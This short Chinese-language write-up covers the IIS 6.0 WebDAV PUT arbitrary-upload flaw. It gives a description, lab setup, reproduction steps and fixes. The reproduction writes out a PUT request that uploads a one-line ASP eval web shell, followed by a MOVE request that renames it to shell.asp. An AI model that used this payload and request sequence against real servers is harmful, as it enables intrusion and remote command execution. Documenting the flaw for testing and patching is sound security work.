PUT漏洞

漏洞描述

IIS Server 在 Web 服务扩展中开启了 WebDAV,配置了可以写入的权限,造成任意文件上传。
版本:IIS 6.0

漏洞搭建

Ⅰ 开启 WebDAV 和写权限
0
1

漏洞复现

用burpsuite 提交OPTIONS 查看支持的协议。
2

使用PUT请求,创建一个.txt的文件。

PUT /test.txt HTTP/1.1
Host: upload.moonteam.com
Content-Length: 25
<%eval request("cmd")%>

使用MOVE请求,将.txt的文件改为.asp文件。

MOVE /test.txt HTTP/1.1
Host: upload.moonteam.com
Destination: http://upload.moonteam.com/shell.asp

3

shell.asp写入成功。

漏洞修复

1.关闭webdav
2.关闭写入权限